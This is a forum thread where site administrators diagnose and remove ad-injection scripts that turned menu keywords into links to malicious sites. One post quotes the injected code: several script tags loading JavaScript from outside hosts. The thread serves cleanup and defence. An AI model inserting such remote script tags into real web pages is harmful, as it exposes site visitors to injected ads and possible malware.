I don't know if this is new or not. Some key words in the menu are linked to malicious sites. "Courses" is one of them. how do I get rid of these?
It's "powered by text enhanced".
Hi Dan,
Maybe this can help : http://wafflesatnoon.com/2011/10/05/seeing-unwanted-text-enhance-ads/
Google came up with a lot more when I typed in "powered by text enhanced". Not sure what's relevant to you.
Cheers,
Glenys
I had the same issue. Log in as admin and turn on editing. There is an "empty" box that appears at the top of the right hand column. I removed that and the ads are gone. Trying to find where it came from now. Will post when I find it.
Well, should have looked into it more before I deleted it. I just wanted the thing gone. Thinking it was an HTML block. Saw JavaScript code from other sites. This was one of them:
http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862
This was another:
http://loading-resource.com/data.geo.php?callback=window.__geo.getData
I just moved that particular site to a new host so gonna go through and check file permissions and such. Thinking this was a "hacker" attack.
Please let me know if anyone else is experiencing this.
Thanks!
Jenny
Just found it in the FrontPage settings front page description block. This is the code:
<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
Still not sure how it got there in the first place, but plan to keep an eye on the site.
I am having this same issue but cannot find where they hid the script. I have checked the html of all the description blocks on the page and in Front Page settings but still no luck. Once you got rid of it, did it come back or did you change any security measures? I am thinking this needs to be reported.
I am going to post how I was able to track this down for anyone that had this problem.
I opened the Front Page and went to View Source. Then I searched for loading-resource.
For me the script appeared between two of my course listings. I went to the course directly above the script and found that the course was infected as well. In the course, I also viewed source and found and deleted all three instances of the script.
I also then changed the password of the offending teacher(!!) and notified her.
I will keep an eye on it but hope this maybe helps someone else.
Hi Emma,
Just to say thanks for this - I'm sure it'll be useful to many.
Also to add "Solved!" to the Subject so people realise that there is a solution.
Cheers,
Glenys
HI,
I am having this same problem and I foud that some browser extensions added this script in text editors , find and delete this extension.